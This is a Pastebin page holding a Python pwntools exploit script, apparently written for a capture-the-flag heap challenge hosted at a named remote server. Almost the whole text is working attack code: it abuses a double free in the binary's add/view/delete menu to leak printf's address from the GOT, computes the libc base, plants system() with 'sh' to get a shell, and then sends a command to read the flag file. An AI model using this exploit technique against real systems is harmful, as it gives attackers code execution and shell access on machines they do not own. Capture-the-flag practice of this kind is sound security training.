Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- from pwn import *
- import sys
- libc = ELF("/lib/i386-linux-gnu/libc.so.6")
- binary = ELF('./bai_3_e17104059d3f25f3e8728ae2cc5277e0')
- printf = 0x080487bb
- #Attach to gdb
- #gdb.attach(p, """
- #""")
- if len(sys.argv) != 1:
- host = "dancecoin.nightst0rm.net"
- port = 1337
- p = remote(host, port)
- else:
- p = process('./bai_3_e17104059d3f25f3e8728ae2cc5277e0')
- #Define function
- def add(strlen, _str):
- p.sendline("1")
- p.sendlineafter("strlen:", str(int(strlen)))
- p.sendlineafter("str:", str(_str))
- log.success("Add %s OK!\n" %(str(_str)))
- def delete(index):
- p.sendline("3")
- p.sendlineafter("index:", str(index))
- log.success("Delete successful at %d!\n" %(index))
- def view(index, delay):
- p.sendline("2")
- p.sendlineafter("(s):", str(delay))
- p.sendlineafter("view index:", str(index))
- log.success("View OK!\n")
- def calculate(name, run_address, offset):
- result = 0
- result = run_address-offset
- print(name + " is: %#x" %(result))
- return result
- def exploit():
- message = "AAAA"
- message += "BBBB"
- message += "CCCC"
- add(0x11, message)
- add(0x11, message)
- add(0x11, message)
- add(0x11, message)
- add(0x11, message)
- view(1, 2)
- delete(1)
- delete(1)
- payload = p32(binary.got['printf'])
- payload += p32(printf)
- add(8, payload)
- p.recvuntil(":\n")
- printf_addr = u32(p.recv(4))
- libc.address = calculate("[-]Libcbase", printf_addr, libc.symbols['printf'])
- log.failure("System: %#x" %(libc.symbols['system']))
- view(2, 2)
- delete(2)
- delete(2)
- ulti = "sh\x00\x00"
- ulti += p32(libc.symbols['system'])
- add(8, ulti)
- lo = log.progress("Capturing the flag")
- sleep(5)
- lo.success("Captured the flag")
- for i in range(10):
- p.sendline('cat /home/pwn3/flag')
- print p.recv(1024)
- p.interactive()
- if __name__ == "__main__":
- # execute only if run as a script
- exploit()
Add Comment
Please, Sign In to add comment
